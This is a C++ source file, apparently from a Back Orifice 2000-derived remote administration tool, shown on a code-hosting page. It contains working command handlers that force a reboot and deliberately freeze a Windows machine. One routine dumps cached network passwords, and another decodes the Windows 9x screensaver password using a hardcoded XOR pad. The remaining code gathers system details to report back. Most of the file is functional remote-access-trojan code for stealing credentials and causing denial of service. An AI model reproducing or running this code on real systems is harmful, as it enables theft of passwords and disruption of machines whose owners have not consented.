📄 cmd_system.cpp
字号:
/* Back Orifice 2000 - Remote Administration Suite
Copyright (C) 1999, Cult Of The Dead Cow
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
The author of this program may be contacted at dildog@l0pht.com. */
#include "stdafx.h"
#include "..\\Ctrl_Srvr9.h"
#include "..\\MainFrm.h"
#include "cmd_system.h"
#include "Func_Bo.h"
int CmdProc_SysReboot(void)
{
BOOL bRet;
// CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
if (g_bIsWinNT)
bRet=ExitWindowsEx(EWX_LOGOFF, 0);
else
bRet=ExitWindowsEx(EWX_FORCE| EWX_REBOOT, 0);
if(bRet==0)
return -1;
// pMainWnd->SendStringMsg ("Reboot attempt failed.");
// IssueAuthCommandReply(cas_from, comid, 0, "Reboot attempt failed.");
else
return 0;
// pMainWnd->SendStringMsg ("Rebooting now.");
// IssueAuthCommandReply(cas_from, comid, 0, "Rebooting now.");
return 0;
}
DWORD WINAPI LockThread(LPVOID param)
{
while(1);
return 0;
}
int CmdProc_SysLockup(void)
{
CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
pMainWnd->SendStringMsg ("MSG: Locking up machine[Don't expect much to work after this!]");
// IssueAuthCommandReply(cas_from,comid,0,"Locking up machine[Don't expect much to work after this!]");
Sleep(2000);
if(g_bIsWinNT)
{
SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
while(1)
{
DWORD dwTid;
HANDLE hThread=CreateThread(NULL,0,LockThread,NULL,0,&dwTid);
SetThreadPriority(hThread,THREAD_PRIORITY_TIME_CRITICAL);
}
}
else
{
lockpoint:
__asm {
cli
jmp lockpoint
}
}
return 0;
}
#pragma pack(push,1)
typedef struct {
char *pBuffer;
int nBufLen;
int nBufPos;
} PASSCACHECALLBACK_DATA;
#pragma pack(pop)
BOOL PASCAL PassCacheCallback(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
{
char buff[1024];
char buff2[1024];
int nCount;
PASSCACHECALLBACK_DATA *dat;
dat = (PASSCACHECALLBACK_DATA *)dwRefData;
nCount=pce->cbResource;
if(nCount>1023) nCount=1023;
memmove(buff, pce->abResource, nCount);
buff[nCount] = 0;
CharToOem(buff, buff2);
if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
dat->nBufPos+=lstrlen(buff2)+1;
nCount=pce->cbPassword;
if(nCount>1023) nCount=1023;
memmove(buff, pce->abResource+pce->cbResource, nCount);
buff[nCount] = 0;
CharToOem(buff, buff2);
if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
dat->nBufPos+=lstrlen(buff2)+1;
return TRUE;
}
int CmdProc_SysListPasswords(CWnd * pWnd)
{
char svBuffer[512];
DWORD dwBufSize;
char svReply[512];
CString strMsg;
CMainFrame *pMainWnd = (CMainFrame *)pWnd;
if (g_bIsWinNT)
{
// PWDump style password dumping
// DumpPasswordHashes(cas_from,comid);
} else {
// Return passwords from password cache
pMainWnd->SendStringMsg ("SYS: Passwords cached by system:");
// IssueAuthCommandReply(cas_from,comid,1,"Passwords cached by system:");
PASSCACHECALLBACK_DATA dat;
dat.pBuffer=(char *)malloc(65536);
dat.nBufLen=65536;
dat.nBufPos=0;
pWNetEnumCachedPasswords(NULL, 0, 0xff, PassCacheCallback, (DWORD) &dat);
pMainWnd->SendStringMsg ("SYS: Cached Passwords:");
// IssueAuthCommandReply(cas_from,comid,1,"Cached Passwords:");
char *svStr;
svStr=dat.pBuffer;
while(*svStr!='\0')
{
char *svRsc=svStr;
svStr+=lstrlen(svStr)+1;
char *svPwd=svStr;
svStr+=lstrlen(svStr)+1;
char svBuff[1024];
wsprintf(svBuff, "SYS: Resource: '%.256s' Password: '%.256s'", svRsc, svPwd);
pMainWnd->SendStringMsg ((LPCTSTR)svBuff);
// IssueAuthCommandReply(cas_from,comid,1,svBuff);
}
free(dat.pBuffer);
pMainWnd->SendStringMsg ("SYS: End of cached passwords.");
// IssueAuthCommandReply(cas_from,comid,1,"End of cached passwords.");
// Return screen saver password
char *regpws[5] = { ".Default", "Control Panel", "desktop", "" };
HKEY key=HKEY_USERS,key2;
int l;
DWORD indx=0;
while(regpws[indx][0])
{
l=RegOpenKeyEx(key, regpws[indx], 0, KEY_READ, &key2) ;
if(key!=HKEY_USERS) RegCloseKey(key);
if(l!=ERROR_SUCCESS)
{
lstrcpy(svReply,"SYS: There is no screensaver password.");
goto exitssavepw;
}
key = key2;
indx++;
}
dwBufSize=512;
if(RegQueryValueEx(key, "ScreenSave_Data", NULL, NULL, (BYTE *)svBuffer, &dwBufSize)!=ERROR_SUCCESS)
{
lstrcpy(svReply, "SYS: Unable to read value 'ScreenSave_Data'.");
}
else
{
// decode hex chars
for (indx = 0; indx < dwBufSize/2; indx++)
{
char c1,c2;
c1=svBuffer[indx*2];
if(c1>='A' && c1<='F') c1=(c1-'A')+0xA;
else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA;
else if(c1>='0' && c1<='9') c1=c1-'0';
c2=svBuffer[indx*2+1];
if(c2>='A' && c2<='F') c2=(c2-'A')+0xA;
else if(c2>='a' && c2<='f') c2=(c2-'a')+0xA;
else if(c2>='0' && c2<='9') c2=c2-'0';
svBuffer[indx] = (c1<<4) | c2;
}
// xor with pad
unsigned char xorpattern[60] = {0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B,
0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F,
0x78, 0xd9, 0xda, 0x6c, 0x59, 0xd7, 0x6B, 0x35,
0xC5, 0x77, 0x85, 0x18, 0x2A, 0x0E, 0x52, 0xFF,
0x00, 0xE3, 0x1B, 0x71, 0x8D, 0x34, 0x63, 0xEB,
0x91, 0xC3, 0x24, 0x0F, 0xB7, 0xC2, 0xF8, 0xE3,
0xB6, 0x54, 0x4C, 0x35, 0x54, 0xE7, 0xC9, 0x49,
0x28, 0xA3, 0x85, 0x11};
DWORD len;
len=dwBufSize/2;
if(len>60) len=60;
for (indx = 0; indx < len; indx++)
{
svBuffer[indx] ^= xorpattern[indx];
}
svBuffer[len] = '\0';
wsprintf(svReply, "SYS: ScreenSaver password: '%s'", svBuffer);
}
RegCloseKey(key);
exitssavepw:
int n = 0;
pMainWnd->SendStringMsg ((LPCTSTR)svReply);
// IssueAuthCommandReply(cas_from, comid,0,svReply);
}
return 0;
}
int CmdProc_SysViewConsole(void)
{
return -1;
}
int CmdProc_SysInfo(CWnd * pWnd)
{
char svBuffer[512];
DWORD dwBufSize;
char svReply[512];
char svReply1[512];
// Send back computer name
CMainFrame *pMainWnd = (CMainFrame *)pWnd;
dwBufSize = MAX_COMPUTERNAME_LENGTH+1;
if(GetComputerName(svBuffer, &dwBufSize)==FALSE)
{
pMainWnd->SendStringMsg ("SYS: Could not retrieve machine name.");
// IssueAuthCommandReply(cas_from,comid,1,"Could not retrieve machine name.");
}
else
{
wsprintf(svReply, "SYS: System info for machine '%.400s'", svBuffer);
pMainWnd->SendStringMsg ((LPCTSTR)svReply);
// IssueAuthCommandReply(cas_from,comid,1,svReply);
}
// Send back currently logged in user name
dwBufSize = 512;
if(GetUserName(svBuffer, &dwBufSize)==FALSE)
{
pMainWnd->SendStringMsg ("SYS: Could not retrieve user name.");
// IssueAuthCommandReply(cas_from,comid,1,"Could not retrieve user name.");
}
else
{
wsprintf(svReply, "SYS: Current user: '%.400s'", svBuffer);
pMainWnd->SendStringMsg ((LPCTSTR)svReply);
// IssueAuthCommandReply(cas_from,comid,1,svReply);
}
// Send back processor info
SYSTEM_INFO sysInfo;
lstrcpy(svReply, "SYS: Processor: ");
GetSystemInfo(&sysInfo);
switch (sysInfo.dwProcessorType)
{
case PROCESSOR_INTEL_386:
lstrcat(svReply, "I386");
break;
case PROCESSOR_INTEL_486:
lstrcat(svReply, "I486");
break;
case PROCESSOR_INTEL_PENTIUM:
lstrcat(svReply, "I586");
break;
case PROCESSOR_MIPS_R4000:
lstrcat(svReply, "MIPSR4000");
break;
default:
lstrcat(svReply, "UNKNOWN");
break;
}
pMainWnd->SendStringMsg ((LPCTSTR)svReply);
// IssueAuthCommandReply(cas_from,comid,1,svReply);
// Send back OS version info
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if (GetVersionEx(&osvi) == FALSE)
{
lstrcpy(svReply, "SYS: Could not get version info.");
}
else
{
switch(osvi.dwPlatformId)
{
case VER_PLATFORM_WIN32s:
lstrcpy( svBuffer, "Win32s on Windows 3.1");
break;
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy( svBuffer, "Win32 on Windows 95");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy( svBuffer, "Windows NT");
break;
default:
lstrcpy( svBuffer, "Windows?");
break;
}
wsprintf( svReply, "SYS: %s v%d.%d build %d", svBuffer, (int)osvi.dwMajorVersion, (int)osvi.dwMinorVersion, (int)LOWORD(osvi.dwBuildNumber));
if(lstrlen(osvi.szCSDVersion))
{
lstrcat(svReply, " - ");
lstrcat(svReply, osvi.szCSDVersion);
}
}
pMainWnd->SendStringMsg ((LPCTSTR)svReply);
// IssueAuthCommandReply(cas_from,comid,1,svReply);
// Send back global memory usage
MEMORYSTATUS memstat;
DWORD dw,dw2,dw3,dw4;
char c;
int x;
memstat.dwLength = sizeof(memstat);
GlobalMemoryStatus(&memstat);
wsprintf(svReply, "SYS: Memory: %dM, in use: %d%%, Page file: %dM, free: %dM", memstat.dwTotalPhys/1024/1024, memstat.dwMemoryLoad, memstat.dwTotalPageFile/1024/1024, memstat.dwAvailPageFile/1024/1024 );
pMainWnd->SendStringMsg ((LPCTSTR)svReply);
// IssueAuthCommandReply(cas_from,comid,1,svReply);
for (c = 'C'; c <= 'Z'; c++)
{
wsprintf(svReply, "%c:\\", c);
x = GetDriveType(svReply);
lstrcat( svReply, " - ");
switch (x)
{
case 0:
lstrcat(svReply, "Unable to determine.");
break;
case 1:
svReply[0]='\0';
break;
case DRIVE_REMOVABLE:
lstrcat(svReply, "Removable");
break;
case DRIVE_FIXED:
lstrcat(svReply, "Fixed");
wsprintf(svBuffer, "%c:\\", c);
if (GetDiskFreeSpace(svBuffer, &dw, &dw2, &dw3, &dw4)) {
wsprintf(svBuffer, " Sec/Clust: %u, Byts/Sec: %u, Bytes free: %u / %u",
(unsigned int)dw, (unsigned int)dw2, (unsigned int)(dw3*dw2*dw), (unsigned int)(dw4*dw2*dw));
lstrcat(svReply, svBuffer);
}
break;
case DRIVE_REMOTE:
lstrcat(svReply, "Remote");
break;
case DRIVE_CDROM:
lstrcat(svReply, "CD-ROM");
break;
case DRIVE_RAMDISK:
lstrcat(svReply, "Ramdisk");
break;
default:
lstrcat(svReply, "Unknown type!");
break;
}
if(lstrlen(svReply))
{
lstrcpy (svReply1,"SYS: ");
lstrcat (svReply1,svReply);
pMainWnd->SendStringMsg ((LPCTSTR)svReply1);
// IssueAuthCommandReply(cas_from,comid,1,svReply);
}
}
// pMainWnd->SendStringMsg ("End of system info");
// IssueAuthCommandReply(cas_from,comid,0,"End of system info");
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -